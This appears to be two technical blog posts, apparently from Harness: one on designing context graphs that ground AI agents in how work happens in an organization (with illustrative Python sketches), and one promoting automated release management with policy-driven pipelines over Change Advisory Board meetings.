This question comes up constantly, so it's worth being precise. A knowledge graph is structural. It models entities and explicit relationships. A context graph adds time and behavior. It models the temporal sequences of actions that move entities through their lifecycle.
You can build a useful knowledge graph without any context graph. People have been doing it for decades with RDF, property graphs, ontologies, and graph databases. What you can't build without a context graph is a model of how work actually happens in your organization.
Concretely, a knowledge graph might tell you:
A context graph layered on top adds:
Each of those statements requires walking entity relationships and looking at temporal action sequences. Neither layer is sufficient on its own.
There's a related comparison worth making, because process mining shows up often in conversations about this and the differences are easy to miss. Traditional process mining assumes relatively structured enterprise workflows running through bounded event systems — ERP, CRM, BPM platforms with consistent event logs and a finite set of process types. The job is to reconstruct an actual process from those logs and then report or optimize against a predefined target. The environment is controlled. The schemas are known. The processes have names.
Context graphs operate in a different environment. The work being modeled is fragmented across chat, docs, tickets, source control, observability tools, calendars, and increasingly agent actions themselves. There is no single event log, no shared schema across tools, and no predefined target workflow to compare against. The underlying systems weren't designed to emit process traces; the traces have to be inferred from messy signals across tools that don't know about each other and weren't built to be joined.
The objective also differs. Process mining tends toward reporting and optimization of workflows you already know exist. A context graph is trying to build an adaptive, agent-consumable model of how work actually happens across structured and unstructured systems — including the parts that no one has ever formally defined as a process. The output isn't a dashboard for a process owner; it's a substrate for agent reasoning that updates as the organization changes.
Put another way: process mining is an analytics problem in a controlled environment. Context graphs are a behavioral modeling problem in an uncontrolled one. The system isn't mining workflows. It's learning organizational behavior, and most of that behavior was never written down.
LLMs can already call tools. The harder problem is that they don't know which tools to call, in what order, on which entities, to accomplish a real task in your environment. They have no model of your organization's process.
Documentation describes intent. Systems of record capture state. Neither captures the actual flow of work. When you ask an agent to "investigate this alert," "draft this proposal," or "onboard this customer," it has to assemble the workflow itself, usually with limited success.
A context graph fills the gap. It gives an agent a learned model of "what tends to happen and in what order" for the situations the agent encounters. Instead of hard-coding workflows in playbooks, the system surfaces the most probable path for the current scenario, and the agent can deviate when the situation warrants.
There's a related constraint that the Harness engineering team frames well: the context window is RAM, and RAM is finite. Every token spent on infrastructure noise is a token that can't be spent on reasoning. A context graph is only useful if the agent can pull just the relevant slice of it into context at the moment it's needed. Loading the whole graph blows the budget.
There's no standard schema yet, but the shape that recurs across implementations is roughly this. An abstracted trace step (the kind that gets aggregated into the context graph) might look like:
{
  "trace_id": "trace_8f2a...",
  "step_index": 3,
  "timestamp_relative_ms": 142000,
  "action_type": "comment",
  "tool_family": "ticketing",
  "entities": {
    "incident_id": "INC-2391",
    "service_id": "payments-api",
    "team_id": "iam"
  },
  "process_tags": ["investigate_alert", "p1_response"],
  "outcome": null,
  "duration_ms": 86000
}
Two things to notice. First, no raw text. No message bodies, no doc contents, no user identifiers. The aggregation is over abstracted steps, not raw activity. Second, knowledge graph entity IDs are first-class on every step. That's how the context graph stays tied to the substrate. Without those IDs, the patterns you mine are interesting but not actionable.
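To make those two properties concrete, here is a minimal Python sketch of a validator for an abstracted step. The field names mirror the example above; the `FORBIDDEN_KEYS` and `ALLOWED_ACTION_TYPES` lists and the `parse_step` helper are illustrative assumptions, not part of any standard schema.

```python
from dataclasses import dataclass, field
from typing import Optional

# Assumed allow-list and deny-list, chosen only for illustration.
ALLOWED_ACTION_TYPES = {"comment", "edit", "open", "merge", "deploy"}
FORBIDDEN_KEYS = {"body", "text", "user_id", "email"}


@dataclass(frozen=True)
class TraceStep:
    trace_id: str
    step_index: int
    timestamp_relative_ms: int
    action_type: str
    tool_family: str
    entities: dict[str, str]
    process_tags: list[str] = field(default_factory=list)
    outcome: Optional[str] = None
    duration_ms: int = 0


def parse_step(raw: dict) -> TraceStep:
    """Build a TraceStep, rejecting raw text and steps with no entity IDs."""
    leaked = FORBIDDEN_KEYS.intersection(raw)
    if leaked:
        raise ValueError(f"raw content or user identifiers present: {sorted(leaked)}")
    if not raw.get("entities"):
        raise ValueError("step has no knowledge graph entity IDs")
    if raw["action_type"] not in ALLOWED_ACTION_TYPES:
        raise ValueError(f"unknown action_type: {raw['action_type']}")
    return TraceStep(**raw)
```

Rejecting a step at ingestion is cheaper than discovering later that an aggregate was built from steps that leak text or can't be tied back to the knowledge graph.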
There's no canonical architecture for context graphs yet. The components that recur across teams shipping one are roughly these.
You can't model what you can't observe. The first investment is connector coverage broad enough to capture change events across the tools where work actually happens: source control, CI/CD, ticketing, chat, docs, calendars, observability, identity. Snapshot data is necessary but not sufficient. You need the event stream of changes over time.
This is harder than it sounds. Each tool has its own API, rate limits, and idea of what "changed" means. Identity reconciliation alone is its own minor industry. The same human is priya@example.com in Slack, priya.k@example.com in GitHub, and Priya Kumar (Engineering) in your HRIS. Until you can prove those are the same person, your aggregates lie to you.
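One common way to model this is a union-find structure over (system, handle) aliases, sketched below in Python. The `IdentityResolver` class is hypothetical, and it assumes the links come from evidence you already trust, such as an SSO or HRIS mapping. It does not try to guess matches from names.

```python
class IdentityResolver:
    """Union-find over (system, handle) aliases."""

    def __init__(self) -> None:
        self._parent: dict[tuple[str, str], tuple[str, str]] = {}

    def _find(self, alias):
        self._parent.setdefault(alias, alias)
        while self._parent[alias] != alias:
            # Path halving keeps lookups fast as alias chains grow.
            self._parent[alias] = self._parent[self._parent[alias]]
            alias = self._parent[alias]
        return alias

    def link(self, a, b) -> None:
        """Record trusted evidence that two aliases are the same person."""
        root_a, root_b = self._find(a), self._find(b)
        if root_a != root_b:
            # Deterministic choice of root so canonical IDs are stable.
            self._parent[max(root_a, root_b)] = min(root_a, root_b)

    def canonical(self, alias):
        return self._find(alias)

    def same_person(self, a, b) -> bool:
        return self._find(a) == self._find(b)
```

Linking Slack to GitHub and GitHub to the HRIS record is enough for all three aliases to resolve to one canonical identity, which is the property the aggregates depend on.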
Before you put events in a graph, you need agreement on what entities mean. A deployment event from your CD tool, a release from your CI tool, and a change in your ITSM system might describe the same physical action, or three different ones. Without a canonical model, downstream queries are unreliable.
Harness's framing is useful here: the semantic layer is the source of truth for the structure and meaning of the data, and it enforces consistent definitions across tools. This is not supporting infrastructure. It is the substrate the rest of the system depends on. Every aggregation, every query, and every agent decision downstream inherits its meaning from this layer. Get it wrong and the layers above don't fail loudly; they produce confidently wrong output. You can implement it with formal ontologies, JSON Schema, protobuf, or a registry of resource types. The implementation choice is less consequential than the discipline of treating the canonical model as load-bearing and making every connector conform to it.
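As a rough illustration of "every connector conforms to the canonical model," the Python sketch below uses a small registry of normalizers. The tool names (`cd_tool`, `itsm`), the event field names, and the canonical keys are all invented for the example; a real semantic layer would carry far more structure.

```python
from typing import Callable

# Hypothetical canonical schema: every deployment-like event must yield these keys.
CANONICAL_DEPLOYMENT_KEYS = {"entity_type", "service_id", "environment", "state"}

# Registry mapping (tool, event kind) to a normalizer function.
NORMALIZERS: dict[tuple[str, str], Callable[[dict], dict]] = {}


def normalizer(tool: str, kind: str):
    def register(fn):
        NORMALIZERS[(tool, kind)] = fn
        return fn
    return register


@normalizer("cd_tool", "deployment")
def _from_cd(event: dict) -> dict:
    return {"entity_type": "deployment", "service_id": event["service"],
            "environment": event["env"], "state": event["status"].lower()}


@normalizer("itsm", "change")
def _from_itsm(event: dict) -> dict:
    return {"entity_type": "deployment", "service_id": event["ci_name"],
            "environment": event["target"],
            "state": "succeeded" if event["closed_ok"] else "failed"}


def to_canonical(tool: str, kind: str, event: dict) -> dict:
    """Normalize an event, failing loudly on unmapped sources or bad output."""
    try:
        fn = NORMALIZERS[(tool, kind)]
    except KeyError:
        raise LookupError(f"no canonical mapping for {tool}/{kind}") from None
    record = fn(event)
    if set(record) != CANONICAL_DEPLOYMENT_KEYS:
        raise ValueError(f"normalizer for {tool}/{kind} violates the canonical schema")
    return record
```

The point of the loud failure is the one made above: an unmapped or malformed event should stop at the semantic layer rather than flow downstream as confidently wrong data.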
Raw event streams are not directly useful. A given person edits a doc, switches to Slack, opens a PR, runs a build, comes back to the doc. Are those one task or three? The graph needs to carve continuous activity into bounded units of work.
The approaches that work in practice combine cheap signals (shared titles, links between artifacts, time windows, channel names) with an LLM step that looks at sequences of events and infers semantic boundaries: "this cluster looks like investigating an alert," "these actions look like drafting a spec." The output is a labeled task with a coarse type, a duration, and a set of entities touched.
The cheap signals do most of the work. The LLM step is for cases where the cheap signals disagree or run out. Reverse the order and you'll burn a lot of tokens for marginal gains.
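A minimal Python sketch of the cheap-signals-first ordering, assuming just two signals (a time gap and shared artifact IDs). The `Event` shape, the 15-minute gap, and the `stitch` function are assumptions for illustration; the LLM step is deliberately left out and only the boundaries it would need to look at are returned.

```python
from dataclasses import dataclass


@dataclass
class Event:
    ts: float              # seconds since an arbitrary start
    tool: str
    artifacts: frozenset   # IDs of linked docs, tickets, PRs, and so on


def stitch(events, max_gap_s=900.0):
    """Group events into tasks using time gaps and shared artifacts.

    Returns (tasks, ambiguous). `ambiguous` lists the indexes of tasks whose
    opening boundary the two signals disagreed on; only those would be
    passed to an LLM step for a second opinion.
    """
    tasks, ambiguous = [], []
    for event in sorted(events, key=lambda e: e.ts):
        if not tasks:
            tasks.append([event])
            continue
        current = tasks[-1]
        close_in_time = event.ts - current[-1].ts <= max_gap_s
        seen = frozenset().union(*(e.artifacts for e in current))
        shares_artifact = bool(event.artifacts & seen)
        if close_in_time and shares_artifact:
            current.append(event)
        elif not close_in_time and not shares_artifact:
            tasks.append([event])
        else:
            # Signals disagree: split tentatively and flag the boundary.
            ambiguous.append(len(tasks))
            tasks.append([event])
    return tasks, ambiguous
```

In this shape, token spend scales with the number of ambiguous boundaries rather than with the number of events.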
Once you have many personal task traces, you aggregate. Normalize each trace into a sequence of anonymized steps: action type, tool family, knowledge graph entities involved, derived process tags, lightweight timing. Compute similarity between traces. Group similar traces. Mine the most common paths.
The output is a probabilistic model: for situations of type X, the typical sequence is A, B, C with probabilities p1, p2, p3, and timing distributions T1, T2, T3.
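One simple way to get a model of that shape is a first-order Markov chain over step labels, sketched below in Python. This is a stand-in technique, not the similarity-and-grouping pipeline described above, and it ignores timing distributions entirely. The function names and the `<start>`/`<end>` markers are assumptions.

```python
from collections import Counter, defaultdict

START, END = "<start>", "<end>"


def transition_model(traces):
    """Estimate P(next step | current step) from step-label sequences."""
    counts = defaultdict(Counter)
    for trace in traces:
        path = [START, *trace, END]
        for current, nxt in zip(path, path[1:]):
            counts[current][nxt] += 1
    return {
        step: {nxt: n / sum(nexts.values()) for nxt, n in nexts.items()}
        for step, nexts in counts.items()
    }


def typical_path(model, max_steps=20):
    """Greedily follow the most probable transition from START.

    Returns (steps, probability of that greedy path).
    """
    step, path, prob = START, [], 1.0
    for _ in range(max_steps):
        nxt, p = max(model[step].items(), key=lambda kv: kv[1])
        prob *= p
        if nxt == END:
            break
        path.append(nxt)
        step = nxt
    return path, prob
```

Even this toy version returns a probability alongside the path, so a consumer can tell a dominant route from a narrow plurality.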
The word "probabilistic" is doing real work in that sentence, and it's worth pausing on. The graph is not canonical truth and shouldn't be presented to downstream consumers as one. Real organizational processes are noisy, overlapping, partially observable, and constantly evolving. The same situation can resolve through three different paths depending on who's on call, what week of the quarter it is, and which subsystem happened to fail first. A model that collapses that reality into a single deterministic process will quietly mislead the agents that consume it, and the failure mode is the worst kind: confident, plausible, wrong.
Good implementations carry the uncertainty forward rather than papering over it. Each inferred path gets a confidence score that reflects how well the underlying traces actually support it. Temporal weighting decays older traces so the model tracks recent reality instead of the org chart from six quarters ago. Competing paths for the same situation are kept as parallel hypotheses with their own probabilities, not collapsed into the highest-frequency one. Sparse situations are flagged as low-confidence rather than presented with false precision.
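A small Python sketch of temporal weighting with parallel hypotheses, assuming exponential decay with a fixed half-life. The 90-day half-life, the support floor, and the `weighted_paths` name are illustrative choices, not recommendations.

```python
from collections import defaultdict


def weighted_paths(observations, now_days, half_life_days=90.0, min_support=5.0):
    """Score competing paths for one situation with decayed weights.

    `observations` is a list of (path_tuple, observed_at_days). Every path is
    kept as a hypothesis; none is collapsed into the most frequent one.
    """
    weights = defaultdict(float)
    for path, observed_at in observations:
        age = now_days - observed_at
        # Each half-life that passes halves the trace's contribution.
        weights[path] += 0.5 ** (age / half_life_days)
    total = sum(weights.values())
    hypotheses = [
        {"path": path, "probability": w / total, "support": w}
        for path, w in weights.items()
    ]
    hypotheses.sort(key=lambda h: h["probability"], reverse=True)
    # Sparse situations are flagged instead of being reported with false precision.
    return {"hypotheses": hypotheses, "low_confidence": total < min_support}
```

With this weighting, two recent traces of a new path can outrank four traces of an old one from two half-lives ago, and the result is still flagged as low confidence because the total support is thin.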
The agent consuming the graph then has to reason under that uncertainty: pick the most probable path when confidence is high, surface alternatives when it isn't, and fall back to first-principles reasoning when the situation is novel enough that the graph has no strong signal. The graph's job is to make the uncertainty legible to the agent above it, not to hide it behind a single most-likely answer.
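That three-way decision can be sketched as a small Python function. The input shape (a list of dicts with `path` and `probability`, plus a `low_confidence` flag), the 0.7 threshold, and the mode names are all assumptions made for the example.

```python
def choose_strategy(hypotheses, low_confidence, follow_threshold=0.7):
    """Decide how an agent should use the graph's answer for one situation."""
    if low_confidence or not hypotheses:
        # No strong signal: reason from first principles instead.
        return {"mode": "first_principles", "paths": []}
    ranked = sorted(hypotheses, key=lambda h: h["probability"], reverse=True)
    if ranked[0]["probability"] >= follow_threshold:
        return {"mode": "follow", "paths": [ranked[0]["path"]]}
    # Confidence is split: surface the top few alternatives.
    return {"mode": "surface_alternatives", "paths": [h["path"] for h in ranked[:3]]}
```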
The Glean blog calls out a useful constraint here: only treat a pattern as viable if it appears across at least k distinct users and n independent traces. Below that threshold, you're modeling individuals, not processes, and you're at real risk of leaking PII through deanonymization. Pick your k and n before you ship, not after.
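Enforcing the threshold is a few lines of Python. In this sketch, "independent traces" is approximated by counting distinct trace IDs, and the default values of `k` and `n` are placeholders rather than recommendations.

```python
from collections import defaultdict


def viable_patterns(traces, k=5, n=20):
    """Keep only patterns seen across >= k distinct users and >= n traces.

    `traces` is an iterable of (user_id, trace_id, pattern). User IDs are used
    only for counting and never appear in the output.
    """
    users, trace_ids = defaultdict(set), defaultdict(set)
    for user_id, trace_id, pattern in traces:
        users[pattern].add(user_id)
        trace_ids[pattern].add(trace_id)
    return {
        pattern: {"distinct_users": len(users[pattern]), "traces": len(trace_ids[pattern])}
        for pattern in users
        if len(users[pattern]) >= k and len(trace_ids[pattern]) >= n
    }
```

A pattern with many traces from a single user fails the check, which is exactly the case where an "aggregate" is really one person's behavior.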
Pure graph stores are great for traversal but rigid for free-form text. Pure vector stores are great for semantic similarity but blind to structure. A hybrid approach is what most teams converge on: graph entities and edges for relationships, with text chunks tagged by entity IDs that get embedded for semantic search.
This is the same pattern that underpins KG + RAG systems more generally. The graph provides depth (relationships, lineage, ownership). The vector index provides breadth (matching free-form queries to relevant content). The semantic layer ties them together so that "the auth incident from yesterday" resolves to a specific node, not a set of approximately-relevant text fragments.
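Here is a toy Python sketch of the join, with plain dictionaries standing in for the graph database and the vector index. The entity IDs, edges, chunk text, and hand-written two-dimensional "embeddings" are invented for illustration; a real system would compute embeddings with a model and query real stores.

```python
import math

# Toy graph store: entity ID -> typed edges.
GRAPH_EDGES = {
    "INC-2391": {"affects": ["payments-api"], "owned_by": ["iam"]},
    "INC-1007": {"affects": ["search-api"], "owned_by": ["search"]},
}
# Toy vector store: text chunks tagged with the entity they describe.
CHUNKS = [
    {"entity_id": "INC-2391", "text": "auth tokens rejected after cert rotation", "vec": [0.9, 0.1]},
    {"entity_id": "INC-1007", "text": "search latency regression", "vec": [0.1, 0.9]},
]


def cosine(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (math.hypot(*a) * math.hypot(*b))


def hybrid_lookup(query_vec, top_k=1):
    """Vector search finds candidate chunks; entity IDs join them to graph context."""
    ranked = sorted(CHUNKS, key=lambda c: cosine(query_vec, c["vec"]), reverse=True)
    return [
        {"entity_id": c["entity_id"], "text": c["text"],
         "relations": GRAPH_EDGES.get(c["entity_id"], {})}
        for c in ranked[:top_k]
    ]
```

The entity ID is the only thing the two stores share, and that is enough for a fuzzy query to come back as a specific node with its relationships attached.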
PLACEHOLDER: hybrid storage diagram. Show two parallel stores at the bottom (a graph database with nodes/edges, and a vector index with embeddings). Above them, a query layer that takes a natural-language question, decomposes it, hits both stores, and returns a unified result. Show entity IDs as the join key between the two stores. Optional: a third lane showing "process traces" stored as ordered sequences referencing the same entity IDs.
A context graph that stops learning is a static playbook with extra plumbing. The architecture only pays off if agent and human actions feed back in as new traces. When an agent runs a workflow, the outputs (which tools it called, in what order, with what result, whether the user accepted the output) become training signal. Successful runs reinforce the patterns. Failed runs flag anti-patterns where the model's predicted path didn't match reality.
This is where the system starts to get interesting from a reinforcement-learning angle. The graph functions as a policy the agent samples actions from, and that policy updates as the agent acts. The Glean piece makes a good operational point on this: if your agents run outside the system that owns the graph, the graph evolves one way and agent behavior evolves another. You end up with two divergent versions of reality. The graph and the orchestration layer have to share a feedback path.
Sunil Gattupalle at Harness frames the agent loop as an operating system. The mapping is more than rhetorical, and it does real design work for context graphs too:
If you take that mapping seriously, the design constraints fall out cleanly. You don't dump the whole context graph into the agent's context window any more than you would cat the entire filesystem into RAM. You build query primitives that let the agent pull the slice it needs.
The Harness MCP redesign is a useful concrete example. The team went from 130+ endpoint-shaped tools to 11 generic verbs (list, get, create, update, execute, describe, diagnose, and a handful of others) backed by a registry that dispatches to the right resource type. The tool count stays constant; capability grows in the registry. Whatever your stack, the underlying lesson holds: keep the agent's "menu" small, push capability into queryable backends, and let the agent reason about what to fetch rather than parse a giant tool catalog.
The same lesson applies to context graphs. You don't expose 50 tools that each query one slice of the graph. You expose a small set of generic query verbs (describe_process, find_similar_traces, get_typical_path) and let the graph itself hold the variety.
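A minimal Python sketch of that shape: two of the generic verbs named above, backed by a registry keyed by process type. The registry contents and payload shapes are hypothetical, and this is not the Harness MCP implementation.

```python
# Hypothetical registry: process type -> handler per verb.
PROCESS_REGISTRY = {
    "investigate_alert": {
        "describe": lambda: {"summary": "triage, inspect dashboards, mitigate"},
        "typical_path": lambda: ["triage", "check_dashboard", "rollback"],
    },
}


def _dispatch(process_type, verb):
    try:
        return PROCESS_REGISTRY[process_type][verb]()
    except KeyError:
        raise LookupError(f"{verb!r} is not registered for {process_type!r}") from None


def describe_process(process_type):
    return _dispatch(process_type, "describe")


def get_typical_path(process_type, max_steps=10):
    # Truncate so the agent receives a small slice, not the whole model.
    return _dispatch(process_type, "typical_path")[:max_steps]
```

Supporting a new process type means adding a registry entry. The set of verbs the agent sees stays the same size.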
PLACEHOLDER: agent loop / OS mapping diagram. Two columns side by side. Left column: classic OS stack (process → syscalls → kernel → drivers → hardware). Right column: agent stack (LLM reasoning → tool calls → harness/kernel → resource registry → backend systems and graphs). Horizontal arrows showing the analogous components.
Patterns that go wrong in real implementations:
Storing events without entity resolution. If you can't reliably say two different event streams are about the same logical entity, your aggregation is meaningless. Identity reconciliation is unglamorous and load-bearing.
Treating the context graph as static. Process changes constantly. Tools come and go. Teams reorg. If your graph stops ingesting and re-aggregating, it ages out fast. Anything older than a quarter is suspect for active processes.
Underinvesting in the semantic layer. Without a canonical model of what entities and actions mean, graph rot accelerates. New tools get integrated with ad-hoc mappings. Queries return inconsistent results. Engineers stop trusting it.
Hard-coding workflows on top of the graph. The whole point is that the system learns process. If you turn around and embed a fixed playbook on every common path, you've built a regular workflow engine with extra plumbing.
Ignoring k-anonymity in aggregation. Aggregate process insights derived from a small number of users are deanonymized personal graphs in disguise. Pick a threshold and enforce it before you ship.
Letting context drift from execution. This is the divergence problem above. The graph that informs the agent and the system the agent acts in have to share a feedback path, or they will desynchronize within weeks.
Loading the wrong thing into context. A 50KB process description in the agent's working memory is 50KB you don't have for reasoning. Design the graph's query API to return small, focused slices. If the only way to use the graph is to dump it, the agent will degrade.
A common question once you have a context graph is whether it's actually useful. Some signals worth tracking:
Coverage. What fraction of meaningful work in your org is represented in the graph? If your most expensive processes aren't in it, the graph isn't helping where it matters.
Path agreement. When an expert is asked to describe how X usually happens, does their description match the graph's most probable path for X? This is a sanity check for trace stitching and aggregation. Disagreement is informative either way: either the graph is wrong, or the expert is describing the ideal rather than what really happens.
Agent task completion. Agents grounded in the graph should complete relevant tasks at higher success rates than agents using only documentation or only tool descriptions. If they don't, the graph is too noisy or too sparse, and you have a calibration problem upstream.
Time-to-fresh. How long after a real-world process changes does the graph reflect it? If it takes weeks, you have built a museum, not a model.
Context cost. What's the average number of tokens an agent spends pulling relevant context from the graph for a given task? Track this over time. If it's growing, your query API is leaking abstraction.
There isn't a standard schema for context graphs the way there is for distributed traces (OpenTelemetry) or feature stores. Every team rolls their own. That's fine for now because the design space is still being explored, but it makes federation across organizations and tools harder than it needs to be. The closest adjacent standard is OCSF for security events, which has the right shape but the wrong domain.
If you're building a context graph today, document your schema with the same rigor you'd apply to a public API. Future-you, and any other team that integrates with your graph, will appreciate it.
Context graphs sit at the intersection of three things engineers have been shipping pieces of for years: knowledge graphs, activity streams, and agentic systems. The new and useful synthesis is the combination. A context graph captures how work actually happens, not just what exists, and it gives agents a structured, queryable model of process to ground their reasoning in.
Whether you call it a context graph, a process graph, a behavioral graph, or just an aggregate activity model, the design constraints are the same. Capture events at depth. Resolve entities to canonical forms. Stitch traces into tasks. Aggregate patterns under privacy thresholds. Store hybrid (graph plus vector). Treat agent execution as both consumer and producer of the graph. Keep the agent's working memory clean.
The teams building this well aren't reinventing graph databases. They're applying old systems-engineering principles (small stable interfaces, demand paging, content-addressable storage, feedback loops) to a problem that's only become tractable in the last couple of years.


The thing with Change Advisory Boards is that the intent was always good. Get smart people in a room, look at the evidence, and make sure nothing catastrophic goes out the door. In theory, that's hard to argue with.
It doesn't scale in practice. Things happen between meetings. Teams rush to hit the window. The CAB meeting may not catch every risky deployment, but at least everyone can feel good about the process before the incident happens.
Automated release management asks a different question entirely. Not "did a human approve this?" but "has this change actually proven it's safe?" Governance moves into the pipeline itself, running the same checks on every change at whatever speed your teams ship.
That's exactly what Harness Continuous Delivery is built for: policy-driven pipelines, automated assurance, and governance that scales with your teams.
Automated release management replaces manual review and approval steps with automated quality gates, policy enforcement, and deployment orchestration.
Rather than routing change decisions through a central committee, automated systems evaluate each change against defined criteria like test coverage, security scans, rollback definitions and compliance checks, then approve or block it based on objective results.
That does not get rid of governance. It brings governance into the delivery pipeline and consistently applies it to all changes, not just the ones that make it onto a CAB agenda.
Automated release management paired with a continuous delivery platform allows teams to deploy frequently, recover quickly, and audit completely, with no meeting necessary.
The CAB model made sense when software changed slowly and release cycles were long. Cross-functional stakeholders would review evidence packets (testing results, deployment plans, security scans) and determine whether a release was safe to promote.
The problem is that the model doesn't scale well as the speed of delivery accelerates. Some patterns keep repeating themselves:
DORA's research provides a useful gut-check here: high-performing engineering teams deploy far more frequently than their peers with lower change failure rates, not higher. It's not approval volume that matters; it's pipeline discipline.
The fundamental problem is not that governance is bad. It is that a meeting-based governance model cannot keep up with a continuous delivery operating model.
The difference in automated release management boils down to a different question at the heart of the process.
Old model: Who approved this?
New model: What did this change prove before we shipped it?
That reframe yields a meaningfully different architecture. Governance takes place on every change, not at scheduled times. Pass/fail criteria are deterministic, not subjective. Compliance is an output of the pipeline, not a prerequisite to enter it.

All changes must be traceable without requiring manual compilation. Version control becomes the single source of truth. CI systems automatically generate commit history, build artifacts and deployment-linked changelogs as part of normal pipeline execution. By default, the audit trail is there.
Harness GitOps takes this a step further, using Git as the single source of truth for the state of the deployment. All configuration changes are versioned, all deployments are tracked, and drift is detected automatically.
Validation moves from presentations to execution. Quality gates run on every change: unit and integration tests, end-to-end validation, security and compliance scans, and performance checks. These are not release-window activities. They are part of the standard CI/CD pipeline, running continuously on every change that moves through.
Harness Powerful Pipelines supports multi-stage pipeline orchestration across complex environments with built-in test intelligence and conditional execution logic. Quality gates run fast and don't create unnecessary bottlenecks.
CAB rules get codified in an automated release management model. No critical vulnerabilities before production promotion. Minimum thresholds for test coverage. Mandatory rollback procedure definitions. These policies are automatically enforced in the pipeline. Pass, and the change proceeds. Fail, and it's reliably blocked at scale, with no human bottleneck in the critical path.
That's what policy as code is all about: governance that's version-controlled, auditable and applied the same way every time.
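To show the idea in miniature, here is a Python sketch that encodes the three example rules above as data and evaluates a change against them. The `ChangeEvidence` fields and the 80% coverage threshold are assumptions, and this is plain Python for illustration rather than the syntax of any particular policy engine.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ChangeEvidence:
    critical_vulnerabilities: int
    test_coverage_pct: float
    rollback_defined: bool


# Each policy is (name, predicate). Thresholds are illustrative.
POLICIES = [
    ("no_critical_vulnerabilities", lambda c: c.critical_vulnerabilities == 0),
    ("min_test_coverage", lambda c: c.test_coverage_pct >= 80.0),
    ("rollback_procedure_defined", lambda c: c.rollback_defined),
]


def evaluate(change: ChangeEvidence) -> dict:
    """Return a deterministic pass/fail decision plus the policies that failed."""
    failed = [name for name, check in POLICIES if not check(change)]
    return {"allowed": not failed, "failed_policies": failed}
```

Because the rules live in a file, changing a threshold is a reviewed commit with history, and the same evidence always produces the same decision.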
Harness DevOps Pipeline Governance lets teams define and enforce pipeline policies in one place. Compliance is not something you check at the end. It's something the pipeline enforces throughout.
Even with strong quality gates, production deployments carry residual risk. Test environments don't always surface the problems that production does.
Harness AI-Assisted Deployment Verification automatically analyzes deployment health using ML to compare metrics, logs and traces against baseline behavior. When something drifts, it surfaces the signal quickly, enabling rollback before an incident escalates. This closes the loop between deployment and validation, making the pipeline genuinely self-correcting, not just self-approving.
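The underlying idea, comparing post-deploy signals to a baseline, can be sketched in Python with a plain z-score check. This is a deliberately simple stand-in, not the ML analysis Harness uses; the metric names, the three-sigma threshold, and the `verify_deployment` function are assumptions.

```python
from statistics import mean, stdev


def verify_deployment(baseline, current, max_sigma=3.0):
    """Flag metrics whose post-deploy mean drifts too far from the baseline.

    `baseline` and `current` map metric name -> list of samples. Each
    baseline list needs at least two samples for a standard deviation.
    """
    regressions = {}
    for metric, samples in baseline.items():
        mu, sigma = mean(samples), stdev(samples)
        observed = mean(current[metric])
        if sigma > 0:
            drift = abs(observed - mu) / sigma
        else:
            # A flat baseline has no spread, so any change counts as drift.
            drift = 0.0 if observed == mu else float("inf")
        if drift > max_sigma:
            regressions[metric] = round(drift, 2)
    return {"rollback": bool(regressions), "regressions": regressions}
```

A real verifier would also handle seasonality, logs, and traces, but the control flow is the same: measure, compare to baseline, and trigger rollback when the drift is too large.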
In practice, systems rarely exist in isolation. One change can affect backend services, APIs, web apps, mobile apps and edge targets all at once. In tightly coupled systems, changes to one component can cause another to break, and partial deployments can be risky without careful coordination.
Traditional coordination uses spreadsheets, emails, and war rooms. Modern automated release management means orchestration: platforms that model service dependencies, trigger pipelines in the right order, and ensure all components pass quality gates before release. Multi-team coordination becomes a single-action, end-to-end deployment.
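"Trigger pipelines in the right order" is a topological sort over the dependency map. The Python sketch below uses the standard library's `graphlib` for that; the service names and the `release_waves` function are hypothetical, and a real orchestrator would run each wave's pipelines rather than just return them.

```python
from graphlib import TopologicalSorter

# Hypothetical dependency map: each service lists what must be deployed first.
DEPENDS_ON = {
    "database-migrations": set(),
    "backend-api": {"database-migrations"},
    "web-app": {"backend-api"},
    "mobile-app": {"backend-api"},
}


def release_waves(depends_on, gates_passed):
    """Return deployment waves in dependency order, or raise if any gate failed."""
    blocked = sorted(s for s in depends_on if not gates_passed.get(s, False))
    if blocked:
        raise RuntimeError(f"quality gates not passed: {blocked}")
    sorter = TopologicalSorter(depends_on)
    sorter.prepare()  # raises graphlib.CycleError on circular dependencies
    waves = []
    while sorter.is_active():
        ready = sorted(sorter.get_ready())
        waves.append(ready)
        sorter.done(*ready)
    return waves
```

Services in the same wave have no dependency on each other, so they can be deployed in parallel; nothing ships at all unless every component has passed its gates.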
Harness Continuous Delivery has built-in support for orchestrated multi-service deployments with dependency mapping and conditional promotion logic. Deploy Anywhere extends this to cloud, hybrid, on-prem and edge environments without requiring separate toolchains for each target.
Harness pipelines also support canary deployments and GitOps-based progressive delivery for rollout strategies tailored to deployment risk.
Managing interdependent releases is a good start. The goal is to reduce the coupling itself so teams can ship independently without synchronized multi-team deployments. Three practices tend to accelerate that:
Together, these patterns move teams toward the continuous delivery ideal: frequent, small, independent releases, each of which is safe on its own.
The results of replacing CAB-driven processes with policy-driven pipelines and automated assurance are measurable:
Harness CD Visualize DevOps Data surfaces deployment frequency, change failure rates and mean time to recovery in real time. These are the DORA metrics that measure delivery health with zero instrumentation overhead.
CABs were created for a slower world, where a weekly review meeting could credibly keep up with the cadence of releases. That world is long gone for most engineering organizations today.
The takeaway here is this: automated release management doesn't remove governance. It rebuilds governance as a system that is fast, consistent, auditable and embedded directly in the delivery pipeline. The teams that move fastest aren't the ones with the loosest controls. They're the ones with controls that don't slow them down.
If you're ready to move from approval bottlenecks to automated assurance, Harness Continuous Delivery is built for exactly that.
Automated release management is the practice of using automated quality gates, policy enforcement and deployment orchestration to replace manual approval steps in the software release process. Rather than routing changes to a committee, the pipeline evaluates each change against predefined criteria and approves or blocks it based on objective results.
A CAB relies on scheduled human review to approve changes before they go into production. Automated release management takes that validation and builds it into the pipeline itself, running the same checks on every change instead of batching them for periodic review. The result is faster delivery with more consistent governance.
Quality gates are automated checkpoints a change must pass before moving to the next stage. Common examples include test coverage thresholds, security scan results, and performance benchmarks. A change that fails a gate is blocked automatically, without human intervention.
Policy as code is the practice of expressing governance rules in version-controlled configuration files rather than documents or meeting agendas. The pipeline then automatically enforces those rules on every deployment, making compliance consistent and auditable by default.
Feature flags decouple code deployment from feature activation. Teams can ship code continuously without exposing unfinished features to users, and can disable a feature instantly if it causes issues in production, without triggering a full rollback.
Incremental strategies like canary deployments work well because they limit the blast radius of any given change. Paired with automated verification, the pipeline can catch problems early in the rollout and halt or roll back before they affect all users.
